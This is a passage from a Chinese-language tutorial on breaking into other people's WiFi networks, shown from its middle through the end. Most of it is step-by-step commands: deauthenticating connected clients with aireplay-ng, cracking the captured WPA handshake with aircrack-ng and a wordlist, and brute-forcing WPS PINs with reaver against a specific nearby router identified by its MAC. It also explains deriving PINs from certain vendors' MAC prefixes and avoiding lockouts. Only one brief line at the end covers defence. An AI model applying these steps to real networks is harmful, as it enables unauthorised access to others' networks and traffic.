抓去握手包
-c:指定信道
-w:指定抓去握手包的存放位置或者名字,freedom是一会抓去的握手包的名字
--bssid:指定路由器的MAC
5. 第五步
再开一个终端输入命令:
aireplay-ng – -deatu 10 -a 路由器MAC -c 客户机MAC
wlan0mon – -ignore-negative-one
使用airplay-ng工具强制断开已经连接到wifi的设备重新连接路由器,来进行抓去数据包
–deatu:指定发送反认证包的个数,也可以使用-0(阿利伯数字0)来指定反认证包的个数
-a:指定路由器的MAC
-c:指定客户机的MAC
6. 第六步
破解握手包
aircrack-ng -a -w dict freedom-*.cap
-a1:指定WEP加密方式
-a2:指定WPA-PSk加密方式
dict:字典的名字
freedom-*.cap:握手包
这个就是我的wifi密码
破解完成,成功与否靠强大的字典和运气了 。
第二种方法1.第一步
Wash扫描开启WPS的网络
wash -i wlan0mon [-C]
由于周围没有开启WPS功能的wifi,就会出现上图那样,这时不要急,因为有些隐藏了起来,我们直接来 。
用前面那个扫wifi的命令:
airodump-ng wlan0mon
看见小编圈起来的MAC没有,选择一个PWR的值的绝对值小于70的wifi破解
2. 第二步
选择一个路由器
我在这选择的是名字为:FAST_F70E的wifi
就他了:E4:D3:32:7F:F7:0E -45 2 0 0 6 54e. WPA2 CCMP PSK FAST_F70E
然后命令如下:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S -vv
E4:D3:32:7F:F7:0E 这个mac根据路由器的mac更改,我破解的wifi的mac是E4:D3:32:7F:F7:0E
如图上表示可以破解,开启了wps功能
出现上图这样,就表示不能破解换其他wifi破解吧孩子
这样就表示破解出来了
注意事项:
如果密码被改了你知道他wifi的pin码就用如下命令:reaver-i mon0 -b MAC -p PIN
pin码有8位:所以就是10的8次方,要穷举1000000000次
这样pin也是有限制的,比如要被pin出的路由器必须得开启wps功能;貌似现在很多都是防pin路由器或300秒pin限制的 。
有些路由pin码可以通过计算得到:腾达和磊科的产品如果路由MAC地址是以"C83A35"或"00B00C"打头那么可以直接计算出PIN值 。
比如这个:bssid :Tenda_579A18 mac :C8:3A:35:57:9A:18 通过计算器将mac后6位换算成10进制数,得到5741080(pin码的前7位),最多试10次或通过软件得到该路由pin码!
破解时推荐这个命令:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S –d9 –t9 -vv
因为–d9 –t9参数可以防止pin死路由器 。
四、如何防止被蹭网1、可以设置复杂密码,密码包含字符、符号和数字,长度设置到12位以上,越复杂的无线密码对方破解难度越大 。加密方式选用WPA-PSK/WPA2-PSK加密方式 。
推荐阅读
- 学习网络推广的方法 各自有什么特点
- 吾是什么意思 吾的含义
- 吃脏东西清理鱼缸的冷水鱼有哪些 吃脏东西清理鱼缸的冷水鱼的简介
- 益州疲弊的疲弊是什么意思 益州疲弊的出处
- 番茄汤饺教程 番茄汤饺的教程步骤
- 生死有命富贵在天什么意思 生死有命富贵的意思
- 关于冬至的作文600字 关于冬至的作文内容
- 盆栽红梅的养殖方法 盆栽红梅怎么养殖
- 众矢之的什么意思 众矢之的指什么
- 白蛇缘起的结局